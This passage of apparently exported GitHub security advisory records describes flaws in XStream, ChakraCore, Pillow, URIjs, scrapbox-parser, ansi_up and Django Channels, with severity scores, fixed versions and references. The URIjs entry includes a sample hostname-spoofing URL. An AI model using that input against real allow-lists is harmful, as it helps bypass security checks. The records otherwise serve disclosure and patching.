'https://lists.apache.org/thread.html/r96ce18044880c33634c4b3fcecc57b8b90673c9364d63eba00385523@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9924ef9357537722b28d04c98a189750b80694a19754e5057c34ca48@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra64d56a8a331ffd7bdcd24a9aaaeeedeacd5d639f5a683389123f898@%3Cdev.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra655e5cec74d1ddf62adacb71d398abd96f3ea2c588f6bbf048348eb@%3Cissues.kudu.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra83096bcbfe6e1f4d54449f8a013117a0536404e9d307ab4a0d34f81@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra96c74c37ed7252f78392e1ad16442bd16ae72a4d6c8db50dd55c88b@%3Ccommits.servicecomb.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/racc191a1f70a4f13155e8002c61bddef2870b26441971c697436ad5d@%3Ccommits.servicecomb.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rae198f44c3f7ac5264045e6ba976be1703cff38dcf1609916e50210d@%3Ccommits.servicecomb.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb06c1e766aa45ee422e8261a8249b561784186483e8f742ea627bda4@%3Cdev.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb51d6202ff1a773f96eaa694b7da4ad3f44922c40b3d4e1a19c2f325@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb523bb6c60196c5f58514b86a8585c2069a4852039b45de3818b29d2@%3Ccommits.servicecomb.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb592033a2462548d061a83ac9449c5ff66098751748fcd1e2d008233@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb95d42ce220ed4a4683aa17833b5006d657bc4254bc5cb03cd5e6bfb@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbadcbcb50195f00bbd196403865ced521ca70787999583c07be38d0e@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbed09768f496244a2e138dbbe6d2847ddf796c9c8ef9e50f2e3e30d9@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc0087125cb15b4b78e44000f841cd37fefedfda942fd7ddf3ad1b528@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc165e36ca7cb5417aec3f21bbc4ec00fb38ecebdd96a82cfab9bd56f@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc73b8dd01b1be276d06bdf07883ecd93fe1a01f139a99ef30ba4308c@%3Ccommits.servicecomb.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rca0978b634a0c3ebee4126ec29c7f570b165fae3f8f3658754c1cbd3@%3Cissues.kudu.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rcd163e421273e8dca1c71ea298dce3dd11b41d51c3a812e0394e6a5d@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rcf3752209a8b04996373bf57fdc808b3bfaa2be8702698a0323641f8@%3Ccommits.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rcfc154eb2de23d2dc08a56100341161e1a40a8ea86c693735437e8f2@%3Ccommits.servicecomb.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rcfc535afd413d9934d6ee509dce234dac41fa3747a7555befb17447e@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd25c88aad0e76240dd09f0eb34bdab924933946429e068a167adcb73@%3Ccommits.servicecomb.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd4a6b7dec38ea6cd28b6f94bd4b312629a52b80be3786d5fb0e474bc@%3Cissues.kudu.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd8f72411fb75b98d366400ae789966373b5c3eb3f511e717caf3e49e@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdb4db3f5a9c478ca52a7b164680b88877a5a9c174e7047676c006b2c@%3Ccommits.servicecomb.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdc096e13ac4501ea2e2b03a197682a313b85d3d3ec89d5ae5551b384@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rddbb4f8d5db23265bb63d14ef4b3723b438abc1589f877db11d35450@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re4f70b62843e92163fab03b65e2aa8078693293a0c36f1cc260079ed@%3Ccommits.servicecomb.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re6207ebe2ca4d44f2a6deee695ad6f27fd29d78980f1d46ed1574f91@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re7c69756a102bebce8b8681882844a53e2f23975a189363e68ad0324@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/reafc834062486adfc7be5bb8f7b7793be0d33f483678a094c3f9d468@%3Ccommits.servicecomb.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf36f1114e84a3379b20587063686148e2d5a39abc0b8a66ff2a9087a@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf87b870a22aa5c77c27900967b518a71a7d954c2952860fce3794b60@%3Ccommits.servicecomb.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf934292a4a1c189827f625d567838d2c1001e4739b158638d844105b@%3Cissues.kudu.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfff6ff8ffb31e8a32619c79774def44b6ffbb037c128c5ad3eab7171@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210604-0003/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4885'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}]","{'cwe_ids': ['CWE-444'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-09T18:47:09Z', 'nvd_published_at': '2021-03-09T19:15:00Z'}" +1.4.0,GHSA-fm9p-5m9f-rq85,2021-03-18T21:46:47Z,2021-03-29T21:00:03Z,,['CVE-2019-0915'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-0912, CVE-2019-0913, CVE-2019-0914, CVE-2019-0916, CVE-2019-0917, CVE-2019-0922, CVE-2019-0923, CVE-2019-0924, CVE-2019-0925, CVE-2019-0927, CVE-2019-0933, CVE-2019-0937.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-0915'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/d797e3f00e34c12c8c0ae52f56344325439dccd7'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/d85b5025b047f10784c53c6c1dd771775d417f5f'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0915'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T21:46:47Z', 'nvd_published_at': '2019-05-16T19:29:00Z'}" +1.4.0,GHSA-74cv-f58x-f9wf,2022-02-08T21:32:55Z,2021-03-22T23:28:13Z,,['CVE-2021-21343'],XStream is vulnerable to an Arbitrary File Deletion on the local host when unmarshalling as long as the executing process has sufficient rights,"### Impact +The processed stream at unmarshalling time contains type information to recreate the formerly written objects. XStream creates therefore new instances based on these type information. An attacker can manipulate the processed input stream and replace or inject objects, that result in the deletion of a file on the local host. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. + +### Patches +If you rely on XStream's default blacklist of the [Security Framework](https://x-stream.github.io/security.html#framework), you will have to use at least version 1.4.16. + +### Workarounds +See [workarounds](https://x-stream.github.io/security.html#workaround) for the different versions covering all CVEs. + +### References +See full information about the nature of the vulnerability and the steps to reproduce it in XStream's documentation for [CVE-2021-21343](https://x-stream.github.io/CVE-2021-21343.html). + +### Credits +钟潦贵 (Liaogui Zhong) found and reported the issue to XStream and provided the required information to reproduce it. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [XStream](https://github.com/x-stream/xstream/issues) +* Contact us at [XStream Google Group](https://groups.google.com/group/xstream-user)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.thoughtworks.xstream:xstream'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.16'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/x-stream/xstream/security/advisories/GHSA-74cv-f58x-f9wf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21343'}, {'type': 'PACKAGE', 'url': 'https://github.com/x-stream/xstream'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8244fd0831db894d5e89911ded9c72196d395a90ae655414d23ed0dd@%3Cusers.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9ac71b047767205aa22e3a08cb33f3e0586de6b2fac48b425c6e16b0@%3Cdev.jmeter.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/04/msg00002.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/22KVR6B5IZP3BGQ3HPWIO2FWWCKT3DHP/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PVPHZA7VW2RRSDCOIPP2W6O5ND254TU7/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QGXIU3YDPG6OGTDHMBLAFN7BPBERXREB/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210430-0002/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5004'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/CVE-2021-21343.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/security.html#workaround'}, {'type': 'WEB', 'url': 'http://x-stream.github.io/changes.html#1.4.16'}]","{'cwe_ids': ['CWE-502', 'CWE-73'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T23:23:36Z', 'nvd_published_at': '2021-03-23T00:15:00Z'}" +1.4.0,GHSA-95q3-8gr9-gm8w,2023-09-04T16:25:25Z,2021-03-18T19:54:43Z,,['CVE-2021-27923'],Pillow Denial of Service by Uncontrolled Resource Consumption,"Pillow before 8.1.1 allows attackers to cause a denial of service (memory consumption) because the reported size of a contained image is not properly checked for an ICO container, and thus an attempted memory allocation can be very large.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Pillow'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27923'}, {'type': 'PACKAGE', 'url': 'https://github.com/python-pillow/Pillow'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/S7G44Z33J4BNI2DPDROHWGVG2U7ZH5JU/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TQQY6472RX4J2SUJENWDZAWKTJJGP2ML/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZTSY25UJU7NJUFHH3HWT575LT4TDFWBZ/'}, {'type': 'WEB', 'url': 'https://pillow.readthedocs.io/en/stable/releasenotes/8.1.1.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202107-33'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-12T23:37:20Z', 'nvd_published_at': '2021-03-03T09:15:00Z'}" +1.4.0,GHSA-8gvg-8vhf-h26g,2021-03-18T22:16:06Z,2021-03-29T20:59:03Z,,['CVE-2019-0937'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-0912, CVE-2019-0913, CVE-2019-0914, CVE-2019-0915, CVE-2019-0916, CVE-2019-0917, CVE-2019-0922, CVE-2019-0923, CVE-2019-0924, CVE-2019-0925, CVE-2019-0927, CVE-2019-0933.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-0937'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/7827e117753052d479fabe19a25cfece88059bca'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/d797e3f00e34c12c8c0ae52f56344325439dccd7'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0937'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T22:16:06Z', 'nvd_published_at': '2019-05-16T19:29:00Z'}" +1.4.0,GHSA-p6j9-7xhc-rhwp,2023-09-07T20:24:16Z,2021-03-01T20:03:53Z,,['CVE-2021-27516'],URIjs Hostname spoofing via backslashes in URL,"### Impact +If using affected versions to determine a URL's hostname, the hostname can be spoofed by using a backslash (`\`) character as part of the scheme delimiter, e.g. `scheme:/\hostname`. If the hostname is used in security decisions, the decision may be incorrect. + +Depending on library usage and attacker intent, impacts may include allow/block list bypasses, SSRF attacks, open redirects, or other undesired behavior. + +Example URL: `https:/\expected-example.com/path` +Escaped string: `https:/\\expected-example.com/path` (JavaScript strings must escape backslash) + +Affected versions incorrectly return no hostname. Patched versions correctly return `expected-example.com`. Patched versions match the behavior of other parsers which implement the [WHATWG URL specification](https://url.spec.whatwg.org/), including web browsers and [Node's built-in URL class](https://nodejs.org/api/url.html). + +### Patches +Version 1.19.6 is patched against all known payload variants. + +### References +https://github.com/medialize/URI.js/releases/tag/v1.19.6 (fix for this particular bypass) +https://github.com/medialize/URI.js/releases/tag/v1.19.4 (fix for related bypass) +https://github.com/medialize/URI.js/releases/tag/v1.19.3 (fix for related bypass) +[PR #233](https://github.com/medialize/URI.js/pull/233) (initial fix for backslash handling) + +### For more information +If you have any questions or comments about this advisory, open an issue in https://github.com/medialize/URI.js + +### Reporter credit +[Yaniv Nizry](https://twitter.com/ynizry) from the CxSCA AppSec team at Checkmarx","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'urijs'}, 'ecosystem_specific': {'affected_functions': ['urijs.parse']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.19.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/medialize/URI.js/security/advisories/GHSA-p6j9-7xhc-rhwp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27516'}, {'type': 'WEB', 'url': 'https://github.com/medialize/URI.js/commit/a1ad8bcbc39a4d136d7e252e76e957f3ece70839'}, {'type': 'WEB', 'url': 'https://advisory.checkmarx.net/advisory/CX-2021-4305'}, {'type': 'PACKAGE', 'url': 'https://github.com/medialize/URI.js'}, {'type': 'WEB', 'url': 'https://github.com/medialize/URI.js/releases/tag/v1.19.6'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-02-26T21:37:41Z', 'nvd_published_at': '2021-02-22T00:15:00Z'}" +1.4.0,GHSA-9fhw-r42p-5c7r,2021-02-26T19:49:07Z,2021-03-01T20:44:44Z,,['CVE-2021-27405'],Regular expression Denial of Service in @progfay/scrapbox-parser,"### Impact + +A [Regular expression Denial of Service](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS) flaw was found in the @progfay/scrapbox-parser package before 6.0.3, 7.0.2 for Node.js. +The attacker that is able to be parsed a specially crafted text may cause the application to consume an excessive amount of CPU. + +### Patches + +Upgrade to version 6.0.3, 7.0.2 or later. + +### Workarounds + +Avoid to parse text with a lot of `[` chars. + +### References + +* https://github.com/progfay/scrapbox-parser/pull/519 +* https://github.com/progfay/scrapbox-parser/pull/539 +* https://github.com/progfay/scrapbox-parser/pull/540 +* https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-27405 +* https://snyk.io/vuln/SNYK-JS-PROGFAYSCRAPBOXPARSER-1076803 + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [github.com/progfay/scrapbox-parser](https://github.com/progfay/scrapbox-parser/issues)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': '@progfay/scrapbox-parser'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.0.3'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@progfay/scrapbox-parser'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/progfay/scrapbox-parser/security/advisories/GHSA-9fhw-r42p-5c7r'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27405'}, {'type': 'WEB', 'url': 'https://github.com/progfay/scrapbox-parser/pull/519'}, {'type': 'WEB', 'url': 'https://github.com/progfay/scrapbox-parser/pull/539'}, {'type': 'WEB', 'url': 'https://github.com/progfay/scrapbox-parser/pull/540'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210326-0002/'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-02-26T19:49:07Z', 'nvd_published_at': '2021-02-19T05:15:00Z'}" +1.4.0,GHSA-2v5f-23xc-v9qr,2023-09-13T22:25:15Z,2021-03-11T22:50:39Z,,['CVE-2021-3377'],ansi_up cross-site scripting vulnerability,"The npm package ansi_up converts ANSI escape codes into HTML. In ansi_up v4, ANSI escape codes can be used to create HTML hyperlinks. Due to insufficient URL sanitization, this feature is affected by a cross-site scripting (XSS) vulnerability. This issue is fixed in v5.0.0.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'ansi_up'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3377'}, {'type': 'WEB', 'url': 'https://github.com/drudru/ansi_up/commit/c8c726ed1db979bae4f257b7fa41775155ba2e27'}, {'type': 'WEB', 'url': 'https://doyensec.com/resources/Doyensec_Advisory_ansi_up4_XSS.pdf'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-11T22:49:55Z', 'nvd_published_at': '2021-03-05T21:15:00Z'}" +1.4.0,GHSA-p23j-g745-8449,2021-03-23T15:25:28Z,2021-03-29T20:55:40Z,,['CVE-2019-1335'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-1307, CVE-2019-1308, CVE-2019-1366.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.14'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-1335'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/a4e56547fb8b7450656bfd26dfc52b8477c8ef27'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/cc871514deeaeaedb5b757c2ca8cd4ab9abccb5d'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1335'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-23T15:25:28Z', 'nvd_published_at': '2019-10-10T14:15:00Z'}" +1.4.0,GHSA-2wwc-w2gw-4329,2021-03-23T15:27:12Z,2021-03-29T20:55:36Z,,['CVE-2019-1366'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-1307, CVE-2019-1308, CVE-2019-1335.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.14'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-1366'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/94181502091b7c22eb86ab1b45ce80bf7ff03aaf'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/cc871514deeaeaedb5b757c2ca8cd4ab9abccb5d'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1366'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-23T15:27:12Z', 'nvd_published_at': '2019-10-10T14:15:00Z'}" +1.4.0,GHSA-v542-8q9x-cffc,2023-09-05T14:34:15Z,2021-03-19T21:29:02Z,,['CVE-2020-35681'],Django Channels leakage of session identifiers using legacy AsgiHandler,"Django Channels 3.x before 3.0.3 allows remote attackers to obtain sensitive information from a different request scope. The legacy channels.http.AsgiHandler class, used for handling HTTP type requests in an ASGI environment prior to Django 3.0, did not correctly separate request scopes in Channels 3.0. In many cases this would result in a crash but, with correct timing, responses could be sent to the wrong client, resulting in potential leakage of session identifiers and other sensitive data. Note that this affects only the legacy Channels provided class, and not Django's similar ASGIHandler, available from Django 3.0.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'channels'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.0.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35681'}, {'type': 'WEB', 'url': 'https://github.com/django/channels/commit/e85874d9630474986a6937430eac52db79a2a022'}, {'type': 'WEB', 'url': 'https://channels.readthedocs.io/en/stable/releases/3.0.3.html'}, {'type': 'WEB', 'url': 'https://channels.readthedocs.io/en/stable/releases/index.html'}, {'type': 'WEB', 'url': 'https://github.com/django/channels/releases'}]","{'cwe_ids': ['CWE-200'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-13T00:47:11Z', 'nvd_published_at': '2021-02-22T03:15:00Z'}" +1.4.0,GHSA-4hrm-m67v-5cxr,2022-02-08T21:32:36Z,2021-03-22T23:28:49Z,,['CVE-2021-21346'],XStream is vulnerable to an Arbitrary Code Execution attack,"### Impact +The vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. + +### Patches +If you rely on XStream's default blacklist of the [Security Framework](https://x-stream.github.io/security.html#framework), you will have to use at least version 1.4.16. + +### Workarounds +See [workarounds](https://x-stream.github.io/security.html#workaround) for the different versions covering all CVEs. + +### References +See full information about the nature of the vulnerability and the steps to reproduce it in XStream's documentation for [CVE-2021-21346](https://x-stream.github.io/CVE-2021-21346.html). + +### Credits +wh1t3p1g G5-RD6@IIE found and reported the issue to XStream and provided the required information to reproduce it. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [XStream](https://github.com/x-stream/xstream/issues) +* Contact us at [XStream Google Group](https://groups.google.com/group/xstream-user)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.thoughtworks.xstream:xstream'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.16'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/x-stream/xstream/security/advisories/GHSA-4hrm-m67v-5cxr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21346'}, {'type': 'PACKAGE', 'url': 'https://github.com/x-stream/xstream'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8244fd0831db894d5e89911ded9c72196d395a90ae655414d23ed0dd@%3Cusers.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9ac71b047767205aa22e3a08cb33f3e0586de6b2fac48b425c6e16b0@%3Cdev.jmeter.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/04/msg00002.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/22KVR6B5IZP3BGQ3HPWIO2FWWCKT3DHP/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PVPHZA7VW2RRSDCOIPP2W6O5ND254TU7/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QGXIU3YDPG6OGTDHMBLAFN7BPBERXREB/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210430-0002/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5004'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/CVE-2021-21346.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/security.html#workaround'}, {'type': 'WEB', 'url': 'http://x-stream.github.io/changes.html#1.4.16'}]","{'cwe_ids': ['CWE-434', 'CWE-502'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T23:24:44Z', 'nvd_published_at': '2021-03-23T00:15:00Z'}" 